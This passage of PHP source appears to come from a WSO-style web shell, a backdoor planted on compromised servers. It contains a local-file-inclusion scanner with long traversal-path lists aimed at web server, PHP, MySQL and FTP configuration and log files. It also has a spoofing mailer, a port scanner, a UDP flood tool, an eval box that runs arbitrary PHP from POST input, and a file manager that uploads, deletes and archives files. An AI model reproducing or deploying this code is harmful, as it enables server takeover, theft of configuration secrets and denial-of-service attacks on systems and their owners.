513 1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",
514 2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",
515 3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",
516 4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",
517 5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",
518 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",
519 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",
520 8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",
521 9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",
522 10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",
523 11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",
524 12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",
525 13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",
526 14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",
527 15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",
528 16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",
529 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",
530 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",
531 19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",
532 20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",
533 21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",
534 22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",
535 23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");
536
537 $lfierror = array(
538 1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",
539 2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",
540 3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",
541 4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",
542 5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",
543 6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",
544 7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",
545 8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",
546 9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",
547 10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",
548 11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",
549 12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",
550 13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",
551 14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",
552 15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",
553 16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",
554 17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",
555 18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",
556 19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",
557 20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",
558 21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",
559 22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",
560 23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");
561 $lficonfig = array(
562 1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",
563 2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",
564 3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",
565 4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",
566 5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",
567 6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",
568 7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",
569 8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",
570 9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",
571 10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",
572 11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",
573 12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",
574 13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",
575 14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",
576 15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",
577 16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",
578 17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",
579 18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",
580 19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",
581 20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",
582 21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",
583 22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",
584 23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",
585 24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",
586 25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",
587 26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",
588 27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",
589 28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",
590 29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",
591 30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",
592 31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",
593 32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",
594 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
595 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
596 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
597
598 $lfiphpini = array(
599 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
600 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
601 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
602 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
603 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
604 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
605 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
606 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
607 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
608 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
609 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
610 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
611 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
612 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
613 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
614 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
615 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
616 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
617 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
618 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
619 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
620 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
621 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
622 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
623 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
624 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
625 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
626
627 $lfimysql = array(
628 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
629 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
630 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
631 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
632 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
633 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
634 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
635 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
636 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
637 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
638
639 $lfiftp = array(
640 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
641 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
642 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
643 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
644 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
645 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
646 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
647 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
648 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
649 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
650 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
651 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
652 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
653 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
654 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
655 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
656 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
657 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
658 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
659 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
660 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
661 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
662 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
663 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
664 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
665 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
666 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
667 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
668 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
669 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
670 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
671 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
672 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
673 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
674 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
675 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
676 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
677 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
678 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
679 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
680 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
681 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
682 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
683 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
684
685
686 $x = 1;
687 if ( $type == 1 ) {
688 $res1 = FetchURL($target.$lfitest);
689 $res2 = FetchURL($target.$lfitest2);
690 $rhash1 = md5($res1);
691 $rhash2 = md5($res2);
692 if ($rhash1 != $rhash2) {
693 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
694 while($lfiaccess[$x]) {
695 $res3 = FetchURL($target.$lfiaccess[$x]);
696 $rhash3 = md5($res3);
697 if ($rhash3 != $rhash2) {
698 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
699 }
700 else {
701 print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
702 }
703 $x++;
704 }
705 }
706 }
707 if ( $type == 2 ) {
708 $res1 = FetchURL($target.$lfitest);
709 $res2 = FetchURL($target.$lfitest2);
710 $rhash1 = md5($res1);
711 $rhash2 = md5($res2);
712 if ($rhash1 != $rhash2) {
713 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
714 while($lficonfig[$x]) {
715 $res3 = FetchURL($target.$lficonfig[$x]);
716 $rhash3 = md5($res3);
717 if ($rhash3 != $rhash2) {
718 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
719 }
720 else {
721 print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
722 }
723 $x++;
724 }
725 }
726 }
727 if ( $type == 3 ) {
728 $res1 = FetchURL($target.$lfitest);
729 $res2 = FetchURL($target.$lfitest2);
730 $rhash1 = md5($res1);
731 $rhash2 = md5($res2);
732 if ($rhash1 != $rhash2) {
733 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
734 while($lfierror[$x]) {
735 $res3 = FetchURL($target.$lfierror[$x]);
736 $rhash3 = md5($res3);
737 if ($rhash3 != $rhash2) {
738 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
739 }
740 else {
741 print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
742 }
743 $x++;
744 }
745 }
746 }
747 if ( $type == 4 ) {
748 $res1 = FetchURL($target.$lfitest);
749 $res2 = FetchURL($target.$lfitest2);
750 $rhash1 = md5($res1);
751 $rhash2 = md5($res2);
752 if ($rhash1 != $rhash2) {
753 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
754 while($lfiphpini[$x]) {
755 $res3 = FetchURL($target.$lfiphpini[$x]);
756 $rhash3 = md5($res3);
757 if ($rhash3 != $rhash2) {
758 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
759 }
760 else {
761 print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
762 }
763 $x++;
764 }
765 }
766 }
767 if ( $type == 5 ) {
768 $res1 = FetchURL($target.$lfitest);
769 $res2 = FetchURL($target.$lfitest2);
770 $rhash1 = md5($res1);
771 $rhash2 = md5($res2);
772 if ($rhash1 != $rhash2) {
773 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
774 while($lfimysql[$x]) {
775 $res3 = FetchURL($target.$lfimysql[$x]);
776 $rhash3 = md5($res3);
777 if ($rhash3 != $rhash2) {
778 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
779 }
780 else {
781 print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
782 }
783 $x++;
784 }
785 }
786 }
787 if ( $type == 6 ) {
788 $res1 = FetchURL($target.$lfitest);
789 $res2 = FetchURL($target.$lfitest2);
790 $rhash1 = md5($res1);
791 $rhash2 = md5($res2);
792 if ($rhash1 != $rhash2) {
793 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
794 while($lfiftp[$x]) {
795 $res3 = FetchURL($target.$lfiftp[$x]);
796 $rhash3 = md5($res3);
797 if ($rhash3 != $rhash2) {
798 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
799 }
800 else {
801 print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
802 }
803 $x++;
804 }
805 }
806 }
807if ( $type == 7 ) {
808 $res1 = FetchURL($target.$lfitest);
809 $res2 = FetchURL($target.$lfitest2);
810 $rhash1 = md5($res1);
811 $rhash2 = md5($res2);
812 if ($rhash1 != $rhash2) {
813 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
814 $res3 = FetchURL($target.$lfiprocenv);
815 $rhash3 = md5($res3);
816 if ($rhash3 != $rhash2) {
817 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
818 }
819 else {
820 print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
821 }
822 }
823 }
824 }
825 }
826wsoFooter();
827}
828function actionphptools() {
829wsoHeader();
830?><center><?php
831//mailer
832echo '<b>Mailer</b><br>
833<form action="'.$surl.'" method=POST>
834<input type="hidden" name="a" value="phptools">
835<input type=text name=to value=to><br>
836<input type=text name=from value=from><br>
837<input type=text name=subject value=subject><br>
838<input type=text name=body value=body><br>
839<input type=submit name=submit value=Submit></form>';
840if (isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])) {
841 $headers = 'From: '.$_POST['from'];
842 mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers);
843 echo 'Email sent.';
844}
845
846//port scanner
847echo '<br><b>Port Scanner</b><br>';
848$start = strip_tags($_POST['start']);
849$end = strip_tags($_POST['end']);
850$host = strip_tags($_POST['host']);
851
852if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
853for($i = $start; $i<=$end; $i++){
854 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
855 if($fp){
856 echo 'Port '.$i.' is <font color=green>open</font><br>';
857 }
858 flush();
859 }
860}else{
861?>
862<form action="?" method="POST">
863<input type="hidden" name="a" value="phptools">
864Host:<br />
865<input type="text" name="host" value="localhost"/><br />
866Port start:<br />
867<input type="text" name="start" value="0"/><br />
868Port end:<br />
869<input type="text" name="end" value="5000"/><br />
870<input type="submit" value="Scan Ports" />
871</form>
872<?php
873}
874
875//UDP
876if(isset($_POST['host'])&&is_numeric($_POST['time'])){
877 $pakits = 0;
878 ignore_user_abort(TRUE);
879 set_time_limit(0);
880
881 $exec_time = $_POST['time'];
882
883 $time = time();
884 //print "Started: ".time('h:i:s')."<br>";
885 $max_time = $time+$exec_time;
886
887 $host = $_POST['host'];
888
889 for($i=0;$i<65000;$i++){
890 $out .= 'X';
891 }
892 while(1){
893 $pakits++;
894 if(time() > $max_time){
895 break;
896 }
897 $rand = rand(1,65000);
898 $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
899 if($fp){
900 fwrite($fp, $out);
901 fclose($fp);
902 }
903 }
904 echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n";
905 echo '<br><br>
906 <form action="'.$surl.'" method=POST>
907 <input type="hidden" name="a" value="phptools">
908 Host: <input type=text name=host value=localhost>
909 Length (seconds): <input type=text name=time value=9999>
910 <input type=submit value=Go></form>';
911}else{ echo '<br><b>UDP Flood</b><br>
912 <form action=? method=POST>
913 <input type="hidden" name="a" value="phptools">
914 Host: <br><input type=text name=host value=localhost><br>
915 Length (seconds): <br><input type=text name=time value=9999><br>
916 <input type=submit value=Go></form>';
917}
918?></center><?php
919wsoFooter();}
920function actionPhp() {
921 if(isset($_POST['ajax'])) {
922 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
923 ob_start();
924 eval($_POST['p1']);
925 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
926 echo strlen($temp), "\n", $temp;
927 exit;
928 }
929 wsoHeader();
930 if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
931 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
932 ob_start();
933 phpinfo();
934 $tmp = ob_get_clean();
935 $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
936 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
937 echo str_replace('<h1','<h2', $tmp) .'</div><br>';
938 }
939 if(empty($_POST['ajax']) && !empty($_POST['p1']))
940 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
941 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
942 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
943 if(!empty($_POST['p1'])) {
944 ob_start();
945 eval($_POST['p1']);
946 echo htmlspecialchars(ob_get_clean());
947 }
948 echo '</pre></div>';
949 wsoFooter();
950}
951
952function actionFilesMan() {
953 wsoHeader();
954 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
955 if(!empty($_POST['p1'])) {
956 switch($_POST['p1']) {
957 case 'uploadFile':
958 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
959 echo "Can't upload file!";
960 break;
961 case 'mkdir':
962 if(!@mkdir($_POST['p2']))
963 echo "Can't create new dir";
964 break;
965 case 'delete':
966 function deleteDir($path) {
967 $path = (substr($path,-1)=='/') ? $path:$path.'/';
968 $dh = opendir($path);
969 while ( ($item = readdir($dh) ) !== false) {
970 $item = $path.$item;
971 if ( (basename($item) == "..") || (basename($item) == ".") )
972 continue;
973 $type = filetype($item);
974 if ($type == "dir")
975 deleteDir($item);
976 else
977 @unlink($item);
978 }
979 closedir($dh);
980 @rmdir($path);
981 }
982 if(is_array(@$_POST['f']))
983 foreach($_POST['f'] as $f) {
984 if($f == '..')
985 continue;
986 $f = urldecode($f);
987 if(is_dir($f))
988 deleteDir($f);
989 else
990 @unlink($f);
991 }
992 break;
993 case 'paste':
994 if($_SESSION['act'] == 'copy') {
995 function copy_paste($c,$s,$d){
996 if(is_dir($c.$s)){
997 mkdir($d.$s);
998 $h = @opendir($c.$s);
999 while (($f = @readdir($h)) !== false)
1000 if (($f != ".") and ($f != ".."))
1001 copy_paste($c.$s.'/',$f, $d.$s.'/');
1002 } elseif(is_file($c.$s))
1003 @copy($c.$s, $d.$s);
1004 }
1005 foreach($_SESSION['f'] as $f)
1006 copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
1007 } elseif($_SESSION['act'] == 'move') {
1008 function move_paste($c,$s,$d){
1009 if(is_dir($c.$s)){
1010 mkdir($d.$s);
1011 $h = @opendir($c.$s);
1012 while (($f = @readdir($h)) !== false)
1013 if (($f != ".") and ($f != ".."))
1014 copy_paste($c.$s.'/',$f, $d.$s.'/');
1015 } elseif(@is_file($c.$s))
1016 @copy($c.$s, $d.$s);
1017 }
1018 foreach($_SESSION['f'] as $f)
1019 @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
1020 } elseif($_SESSION['act'] == 'zip') {
1021 if(class_exists('ZipArchive')) {
1022 $zip = new ZipArchive();
1023 if ($zip->open($_POST['p2'], 1)) {
1024 chdir($_SESSION['c']);
1025 foreach($_SESSION['f'] as $f) {
1026 if($f == '..')
1027 continue;
1028 if(@is_file($_SESSION['c'].$f))
1029 $zip->addFile($_SESSION['c'].$f, $f);
1030 elseif(@is_dir($_SESSION['c'].$f)) {
1031 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
1032 foreach ($iterator as $key=>$value) {
1033 $zip->addFile(realpath($key), $key);
1034 }
1035 }
1036 }
1037 chdir($GLOBALS['cwd']);
1038 $zip->close();
1039 }
1040 }
1041 } elseif($_SESSION['act'] == 'unzip') {
1042 if(class_exists('ZipArchive')) {
1043 $zip = new ZipArchive();
1044 foreach($_SESSION['f'] as $f) {
1045 if($zip->open($_SESSION['c'].$f)) {
1046 $zip->extractTo($GLOBALS['cwd']);
1047 $zip->close();
1048 }
1049 }
1050 }
1051 } elseif($_SESSION['act'] == 'tar') {
1052 chdir($_SESSION['c']);
1053 $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']);
1054 wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f']));
1055 chdir($GLOBALS['cwd']);
1056 }
1057 unset($_SESSION['f']);
1058 break;
1059 default:
1060 if(!empty($_POST['p1'])) {
1061 $_SESSION['act'] = @$_POST['p1'];
1062 $_SESSION['f'] = @$_POST['f'];
1063 foreach($_SESSION['f'] as $k => $f)
1064 $_SESSION['f'][$k] = urldecode($f);
1065 $_SESSION['c'] = @$_POST['c'];
1066 }
1067 break;
1068 }
1069 }
1070 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
1071 if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; }
1072 global $sort;
1073 $sort = array('name', 1);
1074 if(!empty($_POST['p1'])) {
1075 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
1076 $sort = array($match[1], (int)$match[2]);
1077 }
1078echo "<script>
1079 function sa() {
1080 for(i=0;i<d.files.elements.length;i++)
1081 if(d.files.elements[i].type == 'checkbox')
1082 d.files.elements[i].checked = d.files.elements[0].checked;
1083 }
1084
1085</script>
1086<table width='100%' class='main' cellspacing='0' cellpadding='2'>
1087<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
1088 $dirs = $files = array();
1089 $n = count($dirContent);
1090 for($i=0;$i<$n;$i++) {
1091 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
1092 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
1093 $tmp = array('name' => $dirContent[$i],
1094 'path' => $GLOBALS['cwd'].$dirContent[$i],
1095 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
1096 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
1097 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
1098 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
1099 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
1100 );
1101 if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
1102 $files[] = array_merge($tmp, array('type' => 'file'));
